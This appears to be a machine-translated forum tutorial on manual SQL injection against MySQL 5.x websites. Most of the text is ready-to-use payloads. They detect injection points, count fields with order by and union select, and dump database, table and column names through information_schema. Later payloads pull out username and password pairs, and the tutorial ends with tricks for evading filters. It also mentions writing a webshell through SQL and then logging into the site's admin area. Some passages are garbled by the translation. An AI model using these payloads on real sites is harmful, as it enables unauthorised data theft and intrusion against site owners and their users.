Summary of manual injection for MySQL 5.x

According to my understanding of MySQL, the user name and password can be obtained through brute force, blind injection, and error reporting. When the permissions are sufficient, you can also insert and export a webshell statement directly through an SQL statement.

When getting a MySQL injection point, we need to determine the MySQL version. When MySQL version is earlier than 4.0, union select joint queries are not supported. when MySQL version is later than 5.0, there is a default database information_schema, it stores information about all databases (such as the table name, column name, and corresponding permissions). Through this database, we can query data across databases and burst into columns. In general, MySQL is more than 4.0, so we can use joint queries with confidence.
 
MySQL injection has the following ideas:
1. Check whether the injection point has read and write permissions. If yes, you can directly read the configuration file, user name, and password. When magic_quotes_gpc is off, you can export a webshell statement.
// When magic_quotes_gpc is on, 'is converted to \', and the absolute path to be exported must be enclosed by '. Therefore, it hurts ..
2. when there is no read/write permission, you can determine the MySQL version. If MySQL 5.0 or above is used, you can obtain the username and password. If MySQL 5.0 or above is used, the password cannot be cracked (for example, the information_schema database is restricted ), the user name and password can be obtained through blind injection.
// Blind note: In my understanding, it is similar to the injection of Access database to determine whether the query statement is correct or not by returning the correct page.
3. sometimes, because a single parameter may execute multiple query statements, the number of fields cannot be found, or the number is not displayed. If MySQL error ECHO is enabled on the server, you can also get what we want to know from the error message through error injection.
For now, I am not familiar with the blind injection and error reporting methods. Here, I will only briefly introduce the pop-up content of MySQL database version 5.x.
 
 
Step 1: Determine the injection point
Not much. Single quotes, and 1 = 1, and 1 = 2.
 
 
Step 2: order by and union select
Use order by to check the number of fields N and then perform a joint query.
And1 = 2 union select 1, 2, 3, 4..., N --
// First, an error is reported when "and 1 = 2", which can be enclosed in single quotes or added "-" before the parameter.
// This is different from Access. You can skip "from Table Name". The last "--" is a annotator. comment out the following statements to avoid errors, change to "/*" or not.
// Access does not support annotator, MySQL and MSSQL
// These two are not mentioned.
 
 
Step 3: Find Basic Information
After the number is displayed, replace the corresponding digit with the information we want to query. For example, the display digit is 3.
And1 = 2 union select 1, 2, version (), 4..., N --
// Describes several common functions:
1. version () -- MySQL version
2. user () -- user Name
3. database () -- database Name
4. @ datadir -- database path
5. @ version_compile_ OS -- operating system version
We can find the corresponding information by placing the corresponding function in the display bit.
// Introduce several useful functions:
1. concat (str1, str2,...) -- concatenate strings without Separators
2. concat_ws (separator, str1, str2,...) -- concatenate strings with Separators
3. group_concat (str1, str2,...) -- connects all strings in a group and separates each piece of data by commas.
It is abstract and does not need to be understood in detail. You can find all the information of these three functions at a time.
For example: concat (version (), 0x3a, user (), 0x3a, database (), 0x3a, @ datadir, 0x3a, @ verion_compile_ OS)
Concat_ws (0x3a, version (), user (), database (), @ datadir, @ verion_compile_ OS)
Group_concat (version (), 0x3a, user (), 0x3a, database (), 0x3a, @ datadir, 0x3a, @ verion_compile_ OS)
// 0x3a is the hexadecimal format of ":". Here, it is used as a separator. Without it, the items found are connected to one another.
// Some errors may occur during actual query. For example, the @ verion_compile_ OS function often fails .. =
// For MySQL functions can be Baidu, or view the MySQL official manual http://dev.mysql.com/doc/
 
 
Step 4: pop-up and pop-up username and password
There are many explosive methods. Let me talk about some of the methods I know, from the most "gentle" to the "brutal ".
 
First: Query columns in the table
1. and 1 = 2 union select 1, 2, table_name, 4 from (select * from information_schema.tables where table_schema = database name hexadecimal limit N, 1) t limit 1 --
2. and 1 = 2 union select 1, 2, column_name, 4 from (select * from information_schema.columns where table_name = table name hexadecimal and table_schema = database name hexadecimal limit N, 1) t limit 1 --
3. and 1 = 2 union select 1, 2, column name, 4 from Table Name
 
// Change the value of N here to find the names and column names of tables.
// This method is relatively old, and I do not understand the specific principles, especially the t and the later limit 1. Just get to know it.
 
Type 2: Advanced Lookup
1. and 1 = 2 union select 1, 2, schema_name, 4 from information_schema.schemata limit N, 1
2. and 1 = 2 union select 1, 2, table_name, 4 from information_schema.tables where table_schema = hexadecimal limit N, 1
3. and 1 = 2 union select 1, 2, column_name, 4 from information_schema.columns where table_name = hexadecimal limit N, 1
 
// There is a speed-up technique. Enter the database () in the hexadecimal format of the database name to be queried, that is, table_schema = database (), which directly indicates the current database
// Find sensitive tables, including admin, manage, or user
 
Third: pop-up table columns
1. and 1 = 2 union select 1, 2, group_concat (schema_name), 4 from information_schema.schemata
2. and 1 = 2 union select 1, 2, group_concat (table_name), 4 from information_schema.tables where table_schema = hexadecimal format of the database name to be cracked
3. and 1 = 2 union select 1, 2, group_concat (column_name), 4 from information_schema.columns where table_name = hexadecimal format of the name of the table to be cracked
4. and 1 = 2 union select 1, 2, group_concat (column name 1, 0x3a, column name 2), 4 from Table Name
Www.2cto.com
// Distinct indicates that the content is different, that is, the duplicate part of the content is removed. You can add it without adding it.
// This method can be used to directly expose the content of all database names, table names, column names, and fields by using the group_concat () function, which improves the speed and facilitates searching.
 
Type 4: Advanced tabulation burst Columns
1. and 1 = 2 union select 1, 2, group_concat (distinct table_schema), 4 from information_schema.columns
2. and 1 = 2 union select 1, 2, group_concat (distinct table_name), 4 from information_schema.columns where table_schema = hexadecimal format of the name of the database to be cracked
3. and 1 = 2 union select 1, 2, group_concat (distinct column_name), 4 from information_schema.columns where table_name = hexadecimal format of the name of the table to be cracked
4. and 1 = 2 union select 1, 2, group_concat (column name 1, 0x3a, column name 2), 4 from Table Name
 
// All the data is obtained from the information_schema.columns table, because from the information_schema library introduction (http://dev.mysql.com/doc/refman/5.1/zh/information-schema.html) We can see that from the information_schema.columns table, we can find all the information, because it exists in table_schema, table_name, and column_name columns, we can use this table to find all the information we need, saving the table Change step, further speed improvement
 
In this step, even if our injection is complete, find the background for decryption and login. Let me say a few more words.
In other words, MySQL injection is very flexible. I just summarize the most basic statements, but it is just a little bit superficial. For more advanced ones, go to the Forum and Baidu. For example, if the preceding statement cannot be used to identify the cause, we can try these methods.
1. when union select 1, 2, 3, and 4 do not have digits, you can replace all digits with null, and then try to replace them with digits or characters one by one or directly with version (), find the one that can be displayed. This seems to be because of the different types of corresponding variables.
2. sometimes errors occur inexplicably (for example, when a digit is displayed and a replacement function (for example, version () is used to replace the number, a blank page or an error is returned ), when it cannot be cracked, you can try to solve possible encoding problems through functions such as hex () or convert (), such as hex (version ()) unhex (hex (version (), convert (version () using latin1), etc.
3. during the injection, you can replace the space with "+" or "/**/", which is equivalent because the space is automatically converted to "% 20" and looks messy, after the change, it seems that some filtering can be performed.
4. In addition, when filtering a website, consider case-insensitive conversion. Therefore, we often see that the injection statements are strange and unpredictable .. Recently I saw another abnormal Bypass Method ,/*! Select */, put easily filtered items /*! XXX */, the same can be queried normally, that is /*! Select */= select. If you are not at ease, then this will happen /*! SEleCt */. This /*! I still don't understand the principles of XXX */= XXX. I hope Daniel can explain this to me ~
 
PS: The last method will be used in the future. The first three methods will only be used for understanding.